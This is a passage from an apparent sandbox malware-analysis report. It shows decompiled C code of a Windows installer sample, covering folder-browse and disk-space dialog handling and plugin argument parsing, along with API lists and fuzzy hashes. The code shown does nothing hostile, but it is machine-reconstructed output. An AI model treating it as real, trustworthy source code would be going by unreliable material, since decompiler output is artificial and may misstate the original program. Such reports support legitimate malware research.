                                                                            				void _v76;
                                                                            				struct HWND__* _v80;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr _t82;
                                                                            				long _t87;
                                                                            				short* _t89;
                                                                            				void* _t95;
                                                                            				signed int _t96;
                                                                            				int _t109;
                                                                            				signed short _t114;
                                                                            				signed int _t118;
                                                                            				struct HWND__** _t122;
                                                                            				intOrPtr* _t138;
                                                                            				WCHAR* _t146;
                                                                            				unsigned int _t150;
                                                                            				signed int _t152;
                                                                            				unsigned int _t156;
                                                                            				signed int _t158;
                                                                            				signed int* _t159;
                                                                            				signed int* _t160;
                                                                            				struct HWND__* _t166;
                                                                            				struct HWND__* _t167;
                                                                            				int _t169;
                                                                            				unsigned int _t197;
                                                                            
                                                                            				_t156 = __edx;
                                                                            				_t82 =  *0x42c240; // 0x72cc24
                                                                            				_v32 = _t82;
                                                                            				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                                                                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                            				if(_a8 == 0x40b) {
                                                                            					E00405B81(0x3fb, _t146);
                                                                            					E004067C4(_t146);
                                                                            				}
                                                                            				_t167 = _a4;
                                                                            				if(_a8 != 0x110) {
                                                                            					L8:
                                                                            					if(_a8 != 0x111) {
                                                                            						L20:
                                                                            						if(_a8 == 0x40f) {
                                                                            							L22:
                                                                            							_v8 = _v8 & 0x00000000;
                                                                            							_v12 = _v12 & 0x00000000;
                                                                            							E00405B81(0x3fb, _t146);
                                                                            							if(E00405F14(_t186, _t146) == 0) {
                                                                            								_v8 = 1;
                                                                            							}
                                                                            							E0040653D(0x42b238, _t146);
                                                                            							_t87 = E0040690A(1);
                                                                            							_v16 = _t87;
                                                                            							if(_t87 == 0) {
                                                                            								L30:
                                                                            								E0040653D(0x42b238, _t146);
                                                                            								_t89 = E00405EB7(0x42b238);
                                                                            								_t158 = 0;
                                                                            								if(_t89 != 0) {
                                                                            									 *_t89 = 0;
                                                                            								}
                                                                            								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                            									goto L35;
                                                                            								} else {
                                                                            									_t169 = 0x400;
                                                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                            									asm("cdq");
                                                                            									_v48 = _t109;
                                                                            									_v44 = _t156;
                                                                            									_v12 = 1;
                                                                            									goto L36;
                                                                            								}
                                                                            							} else {
                                                                            								_t159 = 0;
                                                                            								if(0 == 0x42b238) {
                                                                            									goto L30;
                                                                            								} else {
                                                                            									goto L26;
                                                                            								}
                                                                            								while(1) {
                                                                            									L26:
                                                                            									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                                            									if(_t114 != 0) {
                                                                            										break;
                                                                            									}
                                                                            									if(_t159 != 0) {
                                                                            										 *_t159 =  *_t159 & _t114;
                                                                            									}
                                                                            									_t160 = E00405E58(0x42b238);
                                                                            									 *_t160 =  *_t160 & 0x00000000;
                                                                            									_t159 = _t160;
                                                                            									 *_t159 = 0x5c;
                                                                            									if(_t159 != 0x42b238) {
                                                                            										continue;
                                                                            									} else {
                                                                            										goto L30;
                                                                            									}
                                                                            								}
                                                                            								_t150 = _v44;
                                                                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                            								_v44 = _t150 >> 0xa;
                                                                            								_v12 = 1;
                                                                            								_t158 = 0;
                                                                            								__eflags = 0;
                                                                            								L35:
                                                                            								_t169 = 0x400;
                                                                            								L36:
                                                                            								_t95 = E00404E27(5);
                                                                            								if(_v12 != _t158) {
                                                                            									_t197 = _v44;
                                                                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                            										_v8 = 2;
                                                                            									}
                                                                            								}
                                                                            								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                                                                            									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                                            									if(_v12 == _t158) {
                                                                            										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                                            									} else {
                                                                            										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                                            									}
                                                                            								}
                                                                            								_t96 = _v8;
                                                                            								 *0x434fa4 = _t96;
                                                                            								if(_t96 == _t158) {
                                                                            									_v8 = E0040140B(7);
                                                                            								}
                                                                            								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                            									_v8 = _t158;
                                                                            								}
                                                                            								E004044BB(0 | _v8 == _t158);
                                                                            								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                                            									E004048E3();
                                                                            								}
                                                                            								 *0x42d258 = _t158;
                                                                            								goto L53;
                                                                            							}
                                                                            						}
                                                                            						_t186 = _a8 - 0x405;
                                                                            						if(_a8 != 0x405) {
                                                                            							goto L53;
                                                                            						}
                                                                            						goto L22;
                                                                            					}
                                                                            					_t118 = _a12 & 0x0000ffff;
                                                                            					if(_t118 != 0x3fb) {
                                                                            						L12:
                                                                            						if(_t118 == 0x3e9) {
                                                                            							_t152 = 7;
                                                                            							memset( &_v76, 0, _t152 << 2);
                                                                            							_v80 = _t167;
                                                                            							_v72 = 0x42d268;
                                                                            							_v60 = E00404CE0;
                                                                            							_v56 = _t146;
                                                                            							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                                            							_t122 =  &_v80;
                                                                            							_v64 = 0x41;
                                                                            							__imp__SHBrowseForFolderW(_t122);
                                                                            							if(_t122 == 0) {
                                                                            								_a8 = 0x40f;
                                                                            							} else {
                                                                            								__imp__CoTaskMemFree(_t122);
                                                                            								E00405E0C(_t146);
                                                                            								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                                            								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
                                                                            									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                                            									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                                            										lstrcatW(_t146, 0x432ea0);
                                                                            									}
                                                                            								}
                                                                            								 *0x42d258 =  *0x42d258 + 1;
                                                                            								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                            							}
                                                                            						}
                                                                            						goto L20;
                                                                            					}
                                                                            					if(_a12 >> 0x10 != 0x300) {
                                                                            						goto L53;
                                                                            					}
                                                                            					_a8 = 0x40f;
                                                                            					goto L12;
                                                                            				} else {
                                                                            					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                            					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                                            						E00405E0C(_t146);
                                                                            					}
                                                                            					 *0x433ed8 = _t167;
                                                                            					SetWindowTextW(_t166, _t146);
                                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                            					_push(1);
                                                                            					E00404499(_t167);
                                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                            					_push(0x14);
                                                                            					E00404499(_t167);
                                                                            					E004044CE(_t166);
                                                                            					_t138 = E0040690A(8);
                                                                            					if(_t138 == 0) {
                                                                            						L53:
                                                                            						return E00404500(_a8, _a12, _a16);
                                                                            					} else {
                                                                            						 *_t138(_t166, 1);
                                                                            						goto L8;
                                                                            					}
                                                                            				}
                                                                            			}














































                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                            • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                            • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                              • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                              • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                            • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                              • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                              • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                              • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                            • API String ID: 2624150263-3142480687
                                                                            • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                            • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                            • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                            • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 95%
                                                                            			E713C1BFF() {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				WCHAR* _v24;
                                                                            				WCHAR* _v28;
                                                                            				signed int _v32;
                                                                            				signed int _v36;
                                                                            				signed int _v40;
                                                                            				signed int _v44;
                                                                            				WCHAR* _v48;
                                                                            				signed int _v52;
                                                                            				void* _v56;
                                                                            				intOrPtr _v60;
                                                                            				WCHAR* _t208;
                                                                            				signed int _t211;
                                                                            				void* _t213;
                                                                            				void* _t215;
                                                                            				WCHAR* _t217;
                                                                            				void* _t225;
                                                                            				struct HINSTANCE__* _t226;
                                                                            				struct HINSTANCE__* _t227;
                                                                            				struct HINSTANCE__* _t229;
                                                                            				signed short _t231;
                                                                            				struct HINSTANCE__* _t234;
                                                                            				struct HINSTANCE__* _t236;
                                                                            				void* _t237;
                                                                            				intOrPtr* _t238;
                                                                            				void* _t249;
                                                                            				signed char _t250;
                                                                            				signed int _t251;
                                                                            				struct HINSTANCE__* _t257;
                                                                            				void* _t258;
                                                                            				signed int _t260;
                                                                            				signed int _t261;
                                                                            				signed short* _t264;
                                                                            				signed int _t269;
                                                                            				signed int _t272;
                                                                            				signed int _t274;
                                                                            				void* _t277;
                                                                            				void* _t281;
                                                                            				struct HINSTANCE__* _t283;
                                                                            				signed int _t286;
                                                                            				void _t287;
                                                                            				signed int _t288;
                                                                            				signed int _t300;
                                                                            				signed int _t301;
                                                                            				signed short _t304;
                                                                            				void* _t305;
                                                                            				signed int _t309;
                                                                            				signed int _t312;
                                                                            				signed int _t315;
                                                                            				signed int _t316;
                                                                            				signed int _t317;
                                                                            				signed short* _t321;
                                                                            				WCHAR* _t322;
                                                                            				WCHAR* _t324;
                                                                            				WCHAR* _t325;
                                                                            				struct HINSTANCE__* _t326;
                                                                            				void* _t328;
                                                                            				signed int _t331;
                                                                            				void* _t332;
                                                                            
                                                                            				_t283 = 0;
                                                                            				_v32 = 0;
                                                                            				_v36 = 0;
                                                                            				_v16 = 0;
                                                                            				_v8 = 0;
                                                                            				_v40 = 0;
                                                                            				_t332 = 0;
                                                                            				_v52 = 0;
                                                                            				_v44 = 0;
                                                                            				_t208 = E713C12BB();
                                                                            				_v24 = _t208;
                                                                            				_v28 = _t208;
                                                                            				_v48 = E713C12BB();
                                                                            				_t321 = E713C12E3();
                                                                            				_v56 = _t321;
                                                                            				_v12 = _t321;
                                                                            				while(1) {
                                                                            					_t211 = _v32;
                                                                            					_v60 = _t211;
                                                                            					if(_t211 != _t283 && _t332 == _t283) {
                                                                            						break;
                                                                            					}
                                                                            					_t286 =  *_t321 & 0x0000ffff;
                                                                            					_t213 = _t286 - _t283;
                                                                            					if(_t213 == 0) {
                                                                            						_t37 =  &_v32;
                                                                            						 *_t37 = _v32 | 0xffffffff;
                                                                            						__eflags =  *_t37;
                                                                            						L20:
                                                                            						_t215 = _v60 - _t283;
                                                                            						if(_t215 == 0) {
                                                                            							__eflags = _t332 - _t283;
                                                                            							 *_v28 = _t283;
                                                                            							if(_t332 == _t283) {
                                                                            								_t332 = GlobalAlloc(0x40, 0x1ca4);
                                                                            								 *(_t332 + 0x1010) = _t283;
                                                                            								 *(_t332 + 0x1014) = _t283;
                                                                            							}
                                                                            							_t287 = _v36;
                                                                            							_t47 = _t332 + 8; // 0x8
                                                                            							_t217 = _t47;
                                                                            							_t48 = _t332 + 0x808; // 0x808
                                                                            							_t322 = _t48;
                                                                            							 *_t332 = _t287;
                                                                            							_t288 = _t287 - _t283;
                                                                            							__eflags = _t288;
                                                                            							 *_t217 = _t283;
                                                                            							 *_t322 = _t283;
                                                                            							 *(_t332 + 0x1008) = _t283;
                                                                            							 *(_t332 + 0x100c) = _t283;
                                                                            							 *(_t332 + 4) = _t283;
                                                                            							if(_t288 == 0) {
                                                                            								__eflags = _v28 - _v24;
                                                                            								if(_v28 == _v24) {
                                                                            									goto L42;
                                                                            								}
                                                                            								_t328 = 0;
                                                                            								GlobalFree(_t332);
                                                                            								_t332 = E713C13B1(_v24);
                                                                            								__eflags = _t332 - _t283;
                                                                            								if(_t332 == _t283) {
                                                                            									goto L42;
                                                                            								} else {
                                                                            									goto L35;
                                                                            								}
                                                                            								while(1) {
                                                                            									L35:
                                                                            									_t249 =  *(_t332 + 0x1ca0);
                                                                            									__eflags = _t249 - _t283;
                                                                            									if(_t249 == _t283) {
                                                                            										break;
                                                                            									}
                                                                            									_t328 = _t332;
                                                                            									_t332 = _t249;
                                                                            									__eflags = _t332 - _t283;
                                                                            									if(_t332 != _t283) {
                                                                            										continue;
                                                                            									}
                                                                            									break;
                                                                            								}
                                                                            								__eflags = _t328 - _t283;
                                                                            								if(_t328 != _t283) {
                                                                            									 *(_t328 + 0x1ca0) = _t283;
                                                                            								}
                                                                            								_t250 =  *(_t332 + 0x1010);
                                                                            								__eflags = _t250 & 0x00000008;
                                                                            								if((_t250 & 0x00000008) == 0) {
                                                                            									_t251 = _t250 | 0x00000002;
                                                                            									__eflags = _t251;
                                                                            									 *(_t332 + 0x1010) = _t251;
                                                                            								} else {
                                                                            									_t332 = E713C162F(_t332);
                                                                            									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                                            								}
                                                                            								goto L42;
                                                                            							} else {
                                                                            								_t300 = _t288 - 1;
                                                                            								__eflags = _t300;
                                                                            								if(_t300 == 0) {
                                                                            									L31:
                                                                            									lstrcpyW(_t217, _v48);
                                                                            									L32:
                                                                            									lstrcpyW(_t322, _v24);
                                                                            									goto L42;
                                                                            								}
                                                                            								_t301 = _t300 - 1;
                                                                            								__eflags = _t301;
                                                                            								if(_t301 == 0) {
                                                                            									goto L32;
                                                                            								}
                                                                            								__eflags = _t301 != 1;
                                                                            								if(_t301 != 1) {
                                                                            									goto L42;
                                                                            								}
                                                                            								goto L31;
                                                                            							}
                                                                            						} else {
                                                                            							if(_t215 == 1) {
                                                                            								_t257 = _v16;
                                                                            								if(_v40 == _t283) {
                                                                            									_t257 = _t257 - 1;
                                                                            								}
                                                                            								 *(_t332 + 0x1014) = _t257;
                                                                            							}
                                                                            							L42:
                                                                            							_v12 = _v12 + 2;
                                                                            							_v28 = _v24;
                                                                            							L59:
                                                                            							if(_v32 != 0xffffffff) {
                                                                            								_t321 = _v12;
                                                                            								continue;
                                                                            							}
                                                                            							break;
                                                                            						}
                                                                            					}
                                                                            					_t258 = _t213 - 0x23;
                                                                            					if(_t258 == 0) {
                                                                            						__eflags = _t321 - _v56;
                                                                            						if(_t321 <= _v56) {
                                                                            							L17:
                                                                            							__eflags = _v44 - _t283;
                                                                            							if(_v44 != _t283) {
                                                                            								L43:
                                                                            								_t260 = _v32 - _t283;
                                                                            								__eflags = _t260;
                                                                            								if(_t260 == 0) {
                                                                            									_t261 = _t286;
                                                                            									while(1) {
                                                                            										__eflags = _t261 - 0x22;
                                                                            										if(_t261 != 0x22) {
                                                                            											break;
                                                                            										}
                                                                            										_t321 =  &(_t321[1]);
                                                                            										__eflags = _v44 - _t283;
                                                                            										_v12 = _t321;
                                                                            										if(_v44 == _t283) {
                                                                            											_v44 = 1;
                                                                            											L162:
                                                                            											_v28 =  &(_v28[0]);
                                                                            											 *_v28 =  *_t321;
                                                                            											L58:
                                                                            											_t331 =  &(_t321[1]);
                                                                            											__eflags = _t331;
                                                                            											_v12 = _t331;
                                                                            											goto L59;
                                                                            										}
                                                                            										_t261 =  *_t321 & 0x0000ffff;
                                                                            										_v44 = _t283;
                                                                            									}
                                                                            									__eflags = _t261 - 0x2a;
                                                                            									if(_t261 == 0x2a) {
                                                                            										_v36 = 2;
                                                                            										L57:
                                                                            										_t321 = _v12;
                                                                            										_v28 = _v24;
                                                                            										_t283 = 0;
                                                                            										__eflags = 0;
                                                                            										goto L58;
                                                                            									}
                                                                            									__eflags = _t261 - 0x2d;
                                                                            									if(_t261 == 0x2d) {
                                                                            										L151:
                                                                            										_t304 =  *_t321;
                                                                            										__eflags = _t304 - 0x2d;
                                                                            										if(_t304 != 0x2d) {
                                                                            											L154:
                                                                            											_t264 =  &(_t321[1]);
                                                                            											__eflags =  *_t264 - 0x3a;
                                                                            											if( *_t264 != 0x3a) {
                                                                            												goto L162;
                                                                            											}
                                                                            											__eflags = _t304 - 0x2d;
                                                                            											if(_t304 == 0x2d) {
                                                                            												goto L162;
                                                                            											}
                                                                            											_v36 = 1;
                                                                            											L157:
                                                                            											_v12 = _t264;
                                                                            											__eflags = _v28 - _v24;
                                                                            											if(_v28 <= _v24) {
                                                                            												 *_v48 = _t283;
                                                                            											} else {
                                                                            												 *_v28 = _t283;
                                                                            												lstrcpyW(_v48, _v24);
                                                                            											}
                                                                            											goto L57;
                                                                            										}
                                                                            										_t264 =  &(_t321[1]);
                                                                            										__eflags =  *_t264 - 0x3e;
                                                                            										if( *_t264 != 0x3e) {
                                                                            											goto L154;
                                                                            										}
                                                                            										_v36 = 3;
                                                                            										goto L157;
                                                                            									}
                                                                            									__eflags = _t261 - 0x3a;
                                                                            									if(_t261 != 0x3a) {
                                                                            										goto L162;
                                                                            									}
                                                                            									goto L151;
                                                                            								}
                                                                            								_t269 = _t260 - 1;
                                                                            								__eflags = _t269;
                                                                            								if(_t269 == 0) {
                                                                            									L80:
                                                                            									_t305 = _t286 + 0xffffffde;
                                                                            									__eflags = _t305 - 0x55;
                                                                            									if(_t305 > 0x55) {
                                                                            										goto L57;
                                                                            									}
                                                                            									switch( *((intOrPtr*)(( *(_t305 + 0x713c23e8) & 0x000000ff) * 4 +  &M713C235C))) {
                                                                            										case 0:
                                                                            											__ecx = _v24;
                                                                            											__edi = _v12;
                                                                            											while(1) {
                                                                            												__edi = __edi + 1;
                                                                            												__edi = __edi + 1;
                                                                            												_v12 = __edi;
                                                                            												__ax =  *__edi;
                                                                            												__eflags = __ax - __dx;
                                                                            												if(__ax != __dx) {
                                                                            													goto L132;
                                                                            												}
                                                                            												L131:
                                                                            												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                            												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                            													L136:
                                                                            													 *__ecx =  *__ecx & 0x00000000;
                                                                            													__eax = E713C12CC(_v24);
                                                                            													__ebx = __eax;
                                                                            													goto L97;
                                                                            												}
                                                                            												L132:
                                                                            												__eflags = __ax;
                                                                            												if(__ax == 0) {
                                                                            													goto L136;
                                                                            												}
                                                                            												__eflags = __ax - __dx;
                                                                            												if(__ax == __dx) {
                                                                            													__edi = __edi + 1;
                                                                            													__edi = __edi + 1;
                                                                            													__eflags = __edi;
                                                                            												}
                                                                            												__ax =  *__edi;
                                                                            												 *__ecx =  *__edi;
                                                                            												__ecx = __ecx + 1;
                                                                            												__ecx = __ecx + 1;
                                                                            												__edi = __edi + 1;
                                                                            												__edi = __edi + 1;
                                                                            												_v12 = __edi;
                                                                            												__ax =  *__edi;
                                                                            												__eflags = __ax - __dx;
                                                                            												if(__ax != __dx) {
                                                                            													goto L132;
                                                                            												}
                                                                            												goto L131;
                                                                            											}
                                                                            										case 1:
                                                                            											_v8 = 1;
                                                                            											goto L57;
                                                                            										case 2:
                                                                            											_v8 = _v8 | 0xffffffff;
                                                                            											goto L57;
                                                                            										case 3:
                                                                            											_v8 = _v8 & 0x00000000;
                                                                            											_v20 = _v20 & 0x00000000;
                                                                            											_v16 = _v16 + 1;
                                                                            											goto L85;
                                                                            										case 4:
                                                                            											__eflags = _v20;
                                                                            											if(_v20 != 0) {
                                                                            												goto L57;
                                                                            											}
                                                                            											_v12 = _v12 - 2;
                                                                            											__ebx = E713C12BB();
                                                                            											 &_v12 = E713C1B86( &_v12);
                                                                            											__eax = E713C1510(__edx, __eax, __edx, __ebx);
                                                                            											goto L97;
                                                                            										case 5:
                                                                            											L105:
                                                                            											_v20 = _v20 + 1;
                                                                            											goto L57;
                                                                            										case 6:
                                                                            											_push(7);
                                                                            											goto L123;
                                                                            										case 7:
                                                                            											_push(0x19);
                                                                            											goto L143;
                                                                            										case 8:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__eflags = 1;
                                                                            											goto L107;
                                                                            										case 9:
                                                                            											_push(0x15);
                                                                            											goto L143;
                                                                            										case 0xa:
                                                                            											_push(0x16);
                                                                            											goto L143;
                                                                            										case 0xb:
                                                                            											_push(0x18);
                                                                            											goto L143;
                                                                            										case 0xc:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__eflags = 1;
                                                                            											goto L118;
                                                                            										case 0xd:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__eflags = 1;
                                                                            											goto L109;
                                                                            										case 0xe:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__eflags = 1;
                                                                            											goto L111;
                                                                            										case 0xf:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__eflags = 1;
                                                                            											goto L122;
                                                                            										case 0x10:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__eflags = 1;
                                                                            											goto L113;
                                                                            										case 0x11:
                                                                            											_push(3);
                                                                            											goto L123;
                                                                            										case 0x12:
                                                                            											_push(0x17);
                                                                            											L143:
                                                                            											_pop(__ebx);
                                                                            											goto L98;
                                                                            										case 0x13:
                                                                            											__eax =  &_v12;
                                                                            											__eax = E713C1B86( &_v12);
                                                                            											__ebx = __eax;
                                                                            											__ebx = __eax + 1;
                                                                            											__eflags = __ebx - 0xb;
                                                                            											if(__ebx < 0xb) {
                                                                            												__ebx = __ebx + 0xa;
                                                                            											}
                                                                            											goto L97;
                                                                            										case 0x14:
                                                                            											__ebx = 0xffffffff;
                                                                            											goto L98;
                                                                            										case 0x15:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__eflags = 1;
                                                                            											goto L116;
                                                                            										case 0x16:
                                                                            											__ecx = 0;
                                                                            											__eflags = 0;
                                                                            											goto L91;
                                                                            										case 0x17:
                                                                            											__eax = 0;
                                                                            											__eax = 1;
                                                                            											__eflags = 1;
                                                                            											goto L120;
                                                                            										case 0x18:
                                                                            											_t271 =  *(_t332 + 0x1014);
                                                                            											__eflags = _t271 - _v16;
                                                                            											if(_t271 > _v16) {
                                                                            												_v16 = _t271;
                                                                            											}
                                                                            											_v8 = _v8 & 0x00000000;
                                                                            											_v20 = _v20 & 0x00000000;
                                                                            											_v36 - 3 = _t271 - (_v36 == 3);
                                                                            											if(_t271 != _v36 == 3) {
                                                                            												L85:
                                                                            												_v40 = 1;
                                                                            											}
                                                                            											goto L57;
                                                                            										case 0x19:
                                                                            											L107:
                                                                            											__ecx = 0;
                                                                            											_v8 = 2;
                                                                            											__ecx = 1;
                                                                            											goto L91;
                                                                            										case 0x1a:
                                                                            											L118:
                                                                            											_push(5);
                                                                            											goto L123;
                                                                            										case 0x1b:
                                                                            											L109:
                                                                            											__ecx = 0;
                                                                            											_v8 = 3;
                                                                            											__ecx = 1;
                                                                            											goto L91;
                                                                            										case 0x1c:
                                                                            											L111:
                                                                            											__ecx = 0;
                                                                            											__ecx = 1;
                                                                            											goto L91;
                                                                            										case 0x1d:
                                                                            											L122:
                                                                            											_push(6);
                                                                            											goto L123;
                                                                            										case 0x1e:
                                                                            											L113:
                                                                            											_push(2);
                                                                            											goto L123;
                                                                            										case 0x1f:
                                                                            											__eax =  &_v12;
                                                                            											__eax = E713C1B86( &_v12);
                                                                            											__ebx = __eax;
                                                                            											__ebx = __eax + 1;
                                                                            											goto L97;
                                                                            										case 0x20:
                                                                            											L116:
                                                                            											_v52 = _v52 + 1;
                                                                            											_push(4);
                                                                            											_pop(__ecx);
                                                                            											goto L91;
                                                                            										case 0x21:
                                                                            											L120:
                                                                            											_push(4);
                                                                            											L123:
                                                                            											_pop(__ecx);
                                                                            											L91:
                                                                            											__edi = _v16;
                                                                            											__edx =  *(0x713c405c + __ecx * 4);
                                                                            											__eax =  ~__eax;
                                                                            											asm("sbb eax, eax");
                                                                            											_v40 = 1;
                                                                            											__edi = _v16 << 5;
                                                                            											__eax = __eax & 0x00008000;
                                                                            											__edi = (_v16 << 5) + __esi;
                                                                            											__eax = __eax | __ecx;
                                                                            											__eflags = _v8;
                                                                            											 *(__edi + 0x1018) = __eax;
                                                                            											if(_v8 < 0) {
                                                                            												L93:
                                                                            												__edx = 0;
                                                                            												__edx = 1;
                                                                            												__eflags = 1;
                                                                            												L94:
                                                                            												__eflags = _v8 - 1;
                                                                            												 *(__edi + 0x1028) = __edx;
                                                                            												if(_v8 == 1) {
                                                                            													__eax =  &_v12;
                                                                            													__eax = E713C1B86( &_v12);
                                                                            													__eax = __eax + 1;
                                                                            													__eflags = __eax;
                                                                            													_v8 = __eax;
                                                                            												}
                                                                            												__eax = _v8;
                                                                            												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                            												_t136 = _v16 + 0x81; // 0x81
                                                                            												_t136 = _t136 << 5;
                                                                            												__eax = 0;
                                                                            												__eflags = 0;
                                                                            												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                            												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                            												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                            												L97:
                                                                            												__eflags = __ebx;
                                                                            												if(__ebx == 0) {
                                                                            													goto L57;
                                                                            												}
                                                                            												L98:
                                                                            												__eflags = _v20;
                                                                            												_v40 = 1;
                                                                            												if(_v20 != 0) {
                                                                            													L103:
                                                                            													__eflags = _v20 - 1;
                                                                            													if(_v20 == 1) {
                                                                            														__eax = _v16;
                                                                            														__eax = _v16 << 5;
                                                                            														__eflags = __eax;
                                                                            														 *(__eax + __esi + 0x102c) = __ebx;
                                                                            													}
                                                                            													goto L105;
                                                                            												}
                                                                            												_v16 = _v16 << 5;
                                                                            												_t144 = __esi + 0x1030; // 0x1030
                                                                            												__edi = (_v16 << 5) + _t144;
                                                                            												__eax =  *__edi;
                                                                            												__eflags = __eax - 0xffffffff;
                                                                            												if(__eax <= 0xffffffff) {
                                                                            													L101:
                                                                            													__eax = GlobalFree(__eax);
                                                                            													L102:
                                                                            													 *__edi = __ebx;
                                                                            													goto L103;
                                                                            												}
                                                                            												__eflags = __eax - 0x19;
                                                                            												if(__eax <= 0x19) {
                                                                            													goto L102;
                                                                            												}
                                                                            												goto L101;
                                                                            											}
                                                                            											__eflags = __edx;
                                                                            											if(__edx > 0) {
                                                                            												goto L94;
